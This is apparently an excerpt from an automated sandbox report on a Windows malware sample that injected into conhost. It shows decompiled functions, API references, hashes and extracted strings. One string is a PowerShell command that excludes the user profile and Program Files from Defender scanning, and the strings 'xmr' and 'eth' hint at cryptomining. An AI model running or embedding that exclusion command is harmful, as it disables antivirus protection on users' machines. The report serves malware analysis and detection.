				if (_t24 == 0) goto 0x7eecdc60;
				if (_t24 > 0) goto 0x7eecdcb0;
				if (_t4 == 0x80000002) goto 0x7eecdc60;
				if (_t4 != 0xc0000005) goto 0x7eecdcbe;
				0x7eed66a8();
				if (__rax == 1) goto 0x7eecdd50;
				if (__rax == 0) goto 0x7eecdcbe;
				 *__rax();
				goto 0x7eecdc65;
				if (0xffffffff == 0xc0000094) goto 0x7eecdcd5;
				if (0xffffffff - 0xc0000094 > 0) goto 0x7eecdc70;
				if (0xffffffff == 0xc0000092) goto 0x7eecdc60;
				if (0xffffffff != 0xc0000093) goto 0x7eecdcbe;
				0x7eed66a8();
				if (__rax != 1) goto 0x7eecdce7;
				0x7eed66a8();
				E00007FF67FF67EECD540(0xffffffff);
				return 0xffffffff;
			}

0x7ff67eecdb8b
0x7ff67eecdb98
0x7ff67eecdbab
0x7ff67eecdbb6
0x7ff67eecdbbd
0x7ff67eecdbbf
0x7ff67eecdbc4
0x7ff67eecdbca
0x7ff67eecdbd5
0x7ff67eecdbe0
0x7ff67eecdbed
0x7ff67eecdbf6
0x7ff67eecdbff
0x7ff67eecdc0a
0x7ff67eecdc11
0x7ff67eecdc18
0x7ff67eecdc1e
0x7ff67eecdc25
0x7ff67eecdc2c
0x7ff67eecdc39
0x7ff67eecdc42
0x7ff67eecdc52
0x7ff67eecdc57
0x7ff67eecdc6a

APIs

signal.MSVCRT ref: 00007FF67EECDBED
signal.MSVCRT ref: 00007FF67EECDC39
signal.MSVCRT ref: 00007FF67EECDC52
signal.MSVCRT ref: 00007FF67EECDD5A

Strings

CCG , xrefs: 00007FF67EECDBA5

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: signal
String ID: CCG
API String ID: 1946981877-1584390748
Opcode ID: 26ac3e8ab430f3d9d29faa2242e9a384ef2839ccf78e479d9403e8aec4ed8c1c
Instruction ID: 5befe920ad622c8abb6c6a2fdf5c5c182455af1c4f4587a4eced2e4583c5974b
Opcode Fuzzy Hash: 26ac3e8ab430f3d9d29faa2242e9a384ef2839ccf78e479d9403e8aec4ed8c1c
Instruction Fuzzy Hash: 96415D62F3950306FB785268849077919819FA9724F398F35F52DC73F2CEDEE8894212

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EECD550 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00007FF67FF67EECD550(signed char __ebx, void* __esi, void* __rcx, long long __rdx, long long __r8, long long __r9, long long _a16, long long _a24, long long _a32) {
				signed int* _v32;
				void* _v124;
				void* _v160;
				void* _t22;
				void* _t23;
				signed int _t29;
				signed char _t30;
				intOrPtr _t47;
				signed int* _t52;
				intOrPtr _t53;
				intOrPtr* _t54;
				long long _t55;
				intOrPtr _t56;
				intOrPtr* _t57;
				intOrPtr _t58;
				void* _t59;
				signed int* _t65;
				signed int* _t66;
				intOrPtr _t70;
				long _t73;
				signed int* _t74;
				void* _t76;
				struct _MEMORY_BASIC_INFORMATION* _t77;
				signed long long _t80;
				signed char* _t83;
				intOrPtr _t91;

				_t30 = __ebx;
				_t52 =  &_a16;
				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_v32 = _t52;
				_t23 = E00007FF67FF67EED6090(_t22, 2, _t52, __rcx);
				r8d = 0x1b;
				0x7eed6678(_t59, _t76);
				_t77 = _v32;
				E00007FF67FF67EED6090(_t23, 2, _t52, "Mingw-w64 runtime failure:\n");
				_t65 = _t52;
				0x7eed66d0();
				0x7eed6630();
				_t74 = _t65;
				_t83 = __rcx;
				if (__esi <= 0) goto 0x7eecd750;
				_t53 =  *0x7eee4e98; // 0x9e1bd2fbf0
				_t54 = _t53 + 0x18;
				_t70 =  *_t54;
				if (_t74 - _t70 < 0) goto 0x7eecd60c;
				_t7 = _t54 + 8; // 0x3a000f00f800eb
				_t91 =  *_t7;
				r8d =  *((intOrPtr*)(_t91 + 8));
				if (_t74 - _t70 + _t91 < 0) goto 0x7eecd695;
				_t55 = _t54 + 0x28;
				if (1 != __esi) goto 0x7eecd5f0;
				_t66 = _t74;
				E00007FF67FF67EECE120(_t66);
				if (_t55 == 0) goto 0x7eecd7a2;
				_t56 =  *0x7eee4e98; // 0x9e1bd2fbf0
				_t80 =  *0x7eee4e94 +  *0x7eee4e94 * 4 << 3;
				_t57 = _t56 + _t80;
				 *((long long*)(_t57 + 0x20)) = _t55;
				 *_t57 = 0;
				E00007FF67FF67EECE260(_t70 + _t91);
				r8d = 0x30;
				_t58 =  *0x7eee4e98; // 0x9e1bd2fbf0
				 *((long long*)(_t58 + _t80 + 0x18)) = _t66 + _t57;
				VirtualQuery(__rcx, _t77, _t73);
				_t47 = _t58;
				if (_t47 == 0) goto 0x7eecd785;
				if (_t47 == 0) goto 0x7eecd68e;
				if (_t47 != 0) goto 0x7eecd700;
				 *0x7eee4e94 =  *0x7eee4e94 + 1;
				if (_t30 - 8 >= 0) goto 0x7eecd6c1;
				if ((_t30 & 0x00000004) != 0) goto 0x7eecd760;
				if (_t30 == 0) goto 0x7eecd6b6;
				_t29 =  *_t83 & 0x000000ff;
				 *_t74 = _t29;
				if ((_t30 & 0x00000002) != 0) goto 0x7eecd774;
				return _t29;
			}

0x7ff67eecd550
0x7ff67eecd556
0x7ff67eecd563
0x7ff67eecd568
0x7ff67eecd56d
0x7ff67eecd572
0x7ff67eecd577
0x7ff67eecd57c
0x7ff67eecd591
0x7ff67eecd596
0x7ff67eecd5a0
0x7ff67eecd5a8
0x7ff67eecd5ae
0x7ff67eecd5b3
0x7ff67eecd5d3
0x7ff67eecd5d6
0x7ff67eecd5dc
0x7ff67eecd5e2
0x7ff67eecd5eb
0x7ff67eecd5f0
0x7ff67eecd5f6
0x7ff67eecd5f8
0x7ff67eecd5f8
0x7ff67eecd5fc
0x7ff67eecd606
0x7ff67eecd60f
0x7ff67eecd615
0x7ff67eecd617
0x7ff67eecd61a
0x7ff67eecd625
0x7ff67eecd62b
0x7ff67eecd636
0x7ff67eecd63a
0x7ff67eecd63d
0x7ff67eecd641
0x7ff67eecd647
0x7ff67eecd656
0x7ff67eecd65f
0x7ff67eecd666
0x7ff67eecd66b
0x7ff67eecd671
0x7ff67eecd674
0x7ff67eecd684
0x7ff67eecd68c
0x7ff67eecd68e
0x7ff67eecd698
0x7ff67eecd69d
0x7ff67eecd6a5
0x7ff67eecd6a7
0x7ff67eecd6ae
0x7ff67eecd6b0
0x7ff67eecd6c0

APIs

VirtualQuery.KERNEL32 ref: 00007FF67EECD66B

Strings

Mingw-w64 runtime failure:, xrefs: 00007FF67EECD587
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF67EECD78C
Address %p has no image-section, xrefs: 00007FF67EECD5C5, 00007FF67EECD7A2
VirtualProtect failed with code 0x%x, xrefs: 00007FF67EECD742

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 1804819252-1534286854
Opcode ID: a490a677982a11cb0dd4f1554884ef401577523b4aa6663380845a95d5331c82
Instruction ID: 01ec53d8968c483ccdfb5c1732deeac6ddc89a01875c3636ced4867d0ee7ba8f
Opcode Fuzzy Hash: a490a677982a11cb0dd4f1554884ef401577523b4aa6663380845a95d5331c82
Instruction Fuzzy Hash: AC61E273B28A4286E7108B65E8402B97BA0FB64794F444A35FF4D877A5EEBDE459C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EED1650 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00007FF67FF67EED1650(void* __edx, void* __rax, void* __rcx, void* __r8) {
				signed int _v72;
				char _v80;
				intOrPtr _t27;
				intOrPtr _t38;
				void* _t46;
				void* _t50;
				void* _t51;
				char* _t60;

				_t50 = __rax;
				_t38 =  *((intOrPtr*)(__r8 + 0x10));
				_t51 = __r8;
				if (_t38 - __edx >= 0) goto 0x7eed1775;
				if (_t38 < 0) goto 0x7eed1775;
				r8d =  *((intOrPtr*)(__r8 + 0xc));
				if (( *(__r8 + 8) & 0x00006000) == 0x6000) goto 0x7eed1780;
				if (_t38 - r8d < 0) goto 0x7eed1710;
				 *((intOrPtr*)(__r8 + 0xc)) = 0xffffffff;
				if (_t38 > 0) goto 0x7eed16cb;
				goto 0x7eed175d;
				_t60 = __rcx + __rax;
				E00007FF67FF67EED15F0(_v72 & 0xffff, __r8);
				if (_t38 == 0) goto 0x7eed175d;
				_v80 = 0;
				strlen(??);
				E00007FF67FF67EED63E0( &_v72, _t60, _t50,  &_v80);
				_t46 = _t50;
				if (_t46 == 0) goto 0x7eed175d;
				if (_t46 >= 0) goto 0x7eed16b0;
				_v72 =  *_t60;
				goto 0x7eed16b5;
				asm("o16 nop [cs:eax+eax]");
				r8d = r8d - _t38 - 1;
				 *((intOrPtr*)(_t51 + 0xc)) = r8d;
				if (0 != 0) goto 0x7eed169b;
				r8d = r8d - 1;
				 *((intOrPtr*)(_t51 + 0xc)) = r8d;
				E00007FF67FF67EED15F0(0x20, _t51);
				 *((intOrPtr*)(_t51 + 0xc)) = _t50 - 1;
				if ( *((intOrPtr*)(_t51 + 0xc)) != 0) goto 0x7eed1730;
				goto 0x7eed169b;
				E00007FF67FF67EED15F0(0x20, _t51);
				_t27 =  *((intOrPtr*)(_t51 + 0xc));
				 *((intOrPtr*)(_t51 + 0xc)) = _t50 - 1;
				if (_t27 > 0) goto 0x7eed1750;
				return _t27;
			}

0x7ff67eed1650
0x7ff67eed165a
0x7ff67eed1663
0x7ff67eed1666
0x7ff67eed166e
0x7ff67eed1677
0x7ff67eed1689
0x7ff67eed1692
0x7ff67eed1694
0x7ff67eed16a7
0x7ff67eed16a9
0x7ff67eed16bb
0x7ff67eed16be
0x7ff67eed16c5
0x7ff67eed16ce
0x7ff67eed16d9
0x7ff67eed16ea
0x7ff67eed16ef
0x7ff67eed16f2
0x7ff67eed16f4
0x7ff67eed16ff
0x7ff67eed1704
0x7ff67eed1706
0x7ff67eed1710
0x7ff67eed1716
0x7ff67eed171a
0x7ff67eed1720
0x7ff67eed1724
0x7ff67eed1738
0x7ff67eed1745
0x7ff67eed1748
0x7ff67eed174a
0x7ff67eed1758
0x7ff67eed175d
0x7ff67eed1765
0x7ff67eed1768
0x7ff67eed1774

APIs

fwprintf.MSVCRT ref: 00007FF67EED179C

Strings

%*.*S, xrefs: 00007FF67EED1795
%.*S, xrefs: 00007FF67EED17BA
%-*.*S, xrefs: 00007FF67EED17CE

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: fwprintf
String ID: %*.*S$%-*.*S$%.*S
API String ID: 968622242-2115465065
Opcode ID: 689da371a2bd30c6dba344da65f34a8d91aaae601624aa41764bdc6e2a43dcb6
Instruction ID: 9ddf3188ebae9d8f96f11e704fcda8bfe2816af8e9e891826a0a33cb07ff009e
Opcode Fuzzy Hash: 689da371a2bd30c6dba344da65f34a8d91aaae601624aa41764bdc6e2a43dcb6
Instruction Fuzzy Hash: 8F41C46BA2864245F750CB35E40077C66A1ABE1BA4F388530FE1DCB7D6DEBCE4498B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EED1900 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF67EED1900(void* __edx, void* __rax, signed short* __rcx, void* __r8) {
				intOrPtr _t16;
				intOrPtr _t27;
				void* _t38;
				void* _t39;
				void* _t45;

				_t38 = __rax;
				_t27 =  *((intOrPtr*)(__r8 + 0x10));
				_t39 = __r8;
				if (_t27 - __edx >= 0) goto 0x7eed19f0;
				if (_t27 < 0) goto 0x7eed19f0;
				r8d =  *((intOrPtr*)(__r8 + 0xc));
				if (( *(__r8 + 8) & 0x00006000) == 0x6000) goto 0x7eed1a15;
				if (r8d - _t27 > 0) goto 0x7eed19b3;
				 *((intOrPtr*)(__r8 + 0xc)) = 0xffffffff;
				if (_t27 <= 0) goto 0x7eed1a6f;
				if (( *__rcx & 0x0000ffff) != 0) goto 0x7eed196b;
				goto 0x7eed199d;
				if (( *__rcx & 0x0000ffff) == 0) goto 0x7eed199d;
				E00007FF67FF67EED15F0( *__rcx & 0x0000ffff, __r8);
				if (_t45 > 0) goto 0x7eed1960;
				 *((intOrPtr*)(_t39 + 0xc)) = _t38 - 1;
				if ( *((intOrPtr*)(_t39 + 0xc)) <= 0) goto 0x7eed19aa;
				E00007FF67FF67EED15F0(0x20, _t39);
				_t16 =  *((intOrPtr*)(_t39 + 0xc));
				 *((intOrPtr*)(_t39 + 0xc)) = _t38 - 1;
				if (_t16 > 0) goto 0x7eed1990;
				return _t16;
			}

0x7ff67eed1900
0x7ff67eed1908
0x7ff67eed1911
0x7ff67eed1914
0x7ff67eed191c
0x7ff67eed1925
0x7ff67eed1937
0x7ff67eed1943
0x7ff67eed1945
0x7ff67eed194e
0x7ff67eed195a
0x7ff67eed195c
0x7ff67eed1969
0x7ff67eed1972
0x7ff67eed1979
0x7ff67eed1983
0x7ff67eed1986
0x7ff67eed1998
0x7ff67eed199d
0x7ff67eed19a5
0x7ff67eed19a8
0x7ff67eed19b2

Strings

%-*.*s, xrefs: 00007FF67EED1A61
%S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, xrefs: 00007FF67EED1903
%.*s, xrefs: 00007FF67EED1A4D
%*.*s, xrefs: 00007FF67EED1A2A

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID:
String ID: %*.*s$%-*.*s$%.*s$%S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
API String ID: 0-4000767721
Opcode ID: b38f23fb3a6864bab4e359a36a28bddbad2d20af5c4b488a959ee07fca8dbb3c
Instruction ID: 871b3b85b5ee62b855f7ce3e50f214dd3801d14a7512eb0be97b4de195f62c9d
Opcode Fuzzy Hash: b38f23fb3a6864bab4e359a36a28bddbad2d20af5c4b488a959ee07fca8dbb3c
Instruction Fuzzy Hash: BC41D67BA2864686E760DF75D40037D7395EBE0794F28C534EE0DCA6C5EEACA5098B10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EEC2BB0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF67EEC2BD4
wcscpy.MSVCRT ref: 00007FF67EEC2C82
wcscat.MSVCRT ref: 00007FF67EEC2C8D
wcslen.MSVCRT ref: 00007FF67EEC2C9E

Strings

\??\, xrefs: 00007FF67EEC2C78

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: memsetwcscatwcscpywcslen
String ID: \??\
API String ID: 468205783-3047946824
Opcode ID: b8e94fffb7c30e32d465071df2bc58f2f84012d84657547b9e674dd48298d0d9
Instruction ID: cb876d7dd4860f7aced51b9abbbbfd9809675c9c450644778fddfc036435c7ba
Opcode Fuzzy Hash: b8e94fffb7c30e32d465071df2bc58f2f84012d84657547b9e674dd48298d0d9
Instruction Fuzzy Hash: A6318F67E38B4284F711DB31F8117792760AFA9784F148A35FA4CC63A1EFBCA1898344

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EECD7C0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF67EECD7C0(void* __eax) {
				intOrPtr _t4;

				_t4 =  *0x7eee4e90; // 0x1
				if (_t4 == 0) goto 0x7eecd7f3;
				return __eax;
			}

0x7ff67eecd7d8
0x7ff67eecd7e0
0x7ff67eecd7f2

APIs

VirtualProtect.KERNEL32(00007FF67EEE59B8,00007FF67EEE59B0,00007FF67EEE4E80,00007FFC2FC93CA0,?,?,?,00000001,00007FF67EEC124C), ref: 00007FF67EECD97D

Part of subcall function 00007FF67EECD5C0: VirtualQuery.KERNEL32 ref: 00007FF67EECD66B

Strings

%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF67EECDB13
Unknown pseudo relocation protocol version %d., xrefs: 00007FF67EECDB22
Unknown pseudo relocation bit size %d., xrefs: 00007FF67EECDAFA

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: Virtual$ProtectQuery
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 1027372294-1286557213
Opcode ID: d35845ebccb0e25e3420e27bd6db4e4e408d37753518ac64c6f20e87d3fd4f30
Instruction ID: b2028ddb8d80ddc685cfbba2dc7c9dfbcfdf719b6d2b2c698d252072ca30e79c
Opcode Fuzzy Hash: d35845ebccb0e25e3420e27bd6db4e4e408d37753518ac64c6f20e87d3fd4f30
Instruction Fuzzy Hash: A891D023F28A4285FA208B25D4407B97BA0BFA5798F544B35ED1D877E4DEBEE449C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EECD110 Relevance: 6.3, APIs: 5, Instructions: 95stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF67EECD195
memcpy.MSVCRT ref: 00007FF67EECD1AE
free.MSVCRT ref: 00007FF67EECD1B9

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: 36ee4f09033897dc678cbbe51adc004b2f85351f671f6e58b5f50b07945d5ba1
Instruction ID: 519b219a0a9d2bbb7098a6917b8b11fe12d6da552017a5154a80734c5c0bafce
Opcode Fuzzy Hash: 36ee4f09033897dc678cbbe51adc004b2f85351f671f6e58b5f50b07945d5ba1
Instruction Fuzzy Hash: 1131E863B3DA4341FA665E15AA003799A506FB07E0F184B31FD9D87BE4DFBDE5498200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EED6270 Relevance: 6.1, APIs: 4, Instructions: 92COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 00007FF67EED62CA
MultiByteToWideChar.KERNEL32 ref: 00007FF67EED630A

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 86044afdfd1419f3904302e3722ad6a78a88cedfe16b5f910b3d3f84ca46e248
Instruction ID: 5ecbcd9815ea7fbd83f3ebcb6359e85fa2aefdf1ff92ab141768a79c3eb5f6e6
Opcode Fuzzy Hash: 86044afdfd1419f3904302e3722ad6a78a88cedfe16b5f910b3d3f84ca46e248
Instruction Fuzzy Hash: 3D31B777A2CA828AE7608B25B4003AD7690FBE5754F648535FA88C77D4CFBDD8498B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EEC2D80 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00007FF67FF67EEC2D80(void* __eax, void* __edi, void* __esp, void* __rax, void* __rcx) {
				char _v120;
				char _v136;
				char _v156;
				long long _v160;
				intOrPtr _v196;
				long long _v204;
				intOrPtr _v212;
				intOrPtr _v220;
				intOrPtr _v228;
				intOrPtr _v236;
				long long _v244;
				void* _t28;
				long long _t46;
				void* _t48;
				signed long long _t49;
				long long _t63;
				void* _t67;

				0x7eed66e8();
				_t67 = __rax;
				if (0xfffffffc - __rax + 1 < 0) goto 0x7eec2eb6;
				_t46 =  &_v136;
				_v160 = _t46;
				_t68 =  &_v120;
				goto 0x7eec2deb;
				if (__eax == 0x2f) goto 0x7eec2df5;
				_t49 = _t48 + 1;
				if (__rax - _t49 < 0) goto 0x7eec2ea2;
				if (( *(__rcx + _t49 * 2) & 0x0000ffff) != 0x5c) goto 0x7eec2dd8;
				0x7eed8030();
				0x7eed66e0();
				 *((short*)(_t46 + _t49 * 2)) = 0;
				memset(__edi, 0, 6 << 0);
				E00007FF67FF67EEC2BB0( &_v120, _v160, _t46);
				_v196 = 0;
				_v204 = _t63;
				_v212 = 1;
				_v220 = 3;
				_v228 = 0;
				_v236 = 0x80;
				_v244 = _t63;
				if (E00007FF67FF67EEC3FAD(0x120116, _t63,  &_v156,  &_v120) < 0) goto 0x7eec2e90;
				_t28 = E00007FF67FF67EEC3FEF(0x120116, _t63, _v156, _t68);
				if (_t67 - _t49 + 1 >= 0) goto 0x7eec2deb;
				return _t28;
			}

0x7ff67eec2d96
0x7ff67eec2da5
0x7ff67eec2db3
0x7ff67eec2db9
0x7ff67eec2dc5
0x7ff67eec2dca
0x7ff67eec2dd2
0x7ff67eec2ddc
0x7ff67eec2dde
0x7ff67eec2de5
0x7ff67eec2df3
0x7ff67eec2e00
0x7ff67eec2e0e
0x7ff67eec2e1d
0x7ff67eec2e2a
0x7ff67eec2e30
0x7ff67eec2e3d
0x7ff67eec2e45
0x7ff67eec2e56
0x7ff67eec2e5e
0x7ff67eec2e66
0x7ff67eec2e6e
0x7ff67eec2e76
0x7ff67eec2e89
0x7ff67eec2e90
0x7ff67eec2e9c
0x7ff67eec2eb5

APIs

wcslen.MSVCRT ref: 00007FF67EEC2D96
wcscpy.MSVCRT ref: 00007FF67EEC2E0E

Strings

eth, xrefs: 00007FF67EEC2D89
xmr, xrefs: 00007FF67EEC2D82

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: wcscpywcslen
String ID: eth$xmr
API String ID: 225642448-1727646492
Opcode ID: 0afd669932968f1f817454a84923789aa15fc376cd4f65302de0273806503331
Instruction ID: 8e6d045036d5631923c17cac20815ed08451d9d113021e99572db40787e0afe6
Opcode Fuzzy Hash: 0afd669932968f1f817454a84923789aa15fc376cd4f65302de0273806503331
Instruction Fuzzy Hash: C331EA23728A4185E621DF51E4003BA6E90FBA87A4F844B35FE5C867E5EFBDE049C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EEC33E0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 41%

